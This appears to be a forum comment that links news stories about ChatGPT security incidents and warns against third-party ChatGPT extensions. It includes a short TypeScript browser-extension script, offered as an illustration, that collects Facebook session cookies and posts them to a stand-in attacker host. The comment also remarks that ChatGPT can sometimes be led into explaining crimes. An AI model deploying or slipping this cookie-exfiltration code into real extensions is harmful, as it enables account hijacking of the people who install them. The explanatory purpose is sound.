https://www.wired.com/story/nsa-rob-joyce-chatgpt-security/
Well, I know you can sometimes get it to tell you how to do crimes without jailbreaking it... and I know it's had real security incidents, like the March 2023 Redis bug that leaked other users' chat titles and some payment info... and I know there's another thing... but idk man...
https://cyberdaily.securelayer7.net/chatgpt-data-breach-vulnerability-threats/
No matter what anyone says, installing third-party ChatGPT extensions is a fatal mistake; see the sketch below for why.
https://www.hackread.com/fake-chatgpt-extension-hijack-facebook/
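For anyone wondering why I'm so absolute about that: the fake ChatGPT extension in that Hackread story hijacked Facebook accounts by reading session cookies, which any extension with the right permissions can do. Here's a minimal TypeScript sketch of the general pattern, assuming an MV3 background script whose manifest requests the "cookies" permission and facebook.com host permissions. The file name and URL are hypothetical; this is an illustration of the technique, not the actual malware's code:

```typescript
// background.ts - runs in the extension's service worker.
// There is no browser exploit here. The only "vulnerability" is the
// permissions the user already granted at install time:
//   "permissions": ["cookies"],
//   "host_permissions": ["https://*.facebook.com/*"]

// Read every Facebook cookie the browser holds, including the
// session cookies that authenticate the logged-in account.
chrome.cookies.getAll({ domain: "facebook.com" }, (cookies) => {
  const payload = cookies.map((c) => ({ name: c.name, value: c.value }));

  // Send them to an attacker-controlled server (hypothetical URL).
  // Whoever receives these can replay the session and take over the account.
  fetch("https://attacker.example/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  });
});
```

That's the whole attack: a dozen lines against a documented API, which is exactly why "it's a popular extension" tells you nothing about whether it's safe.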
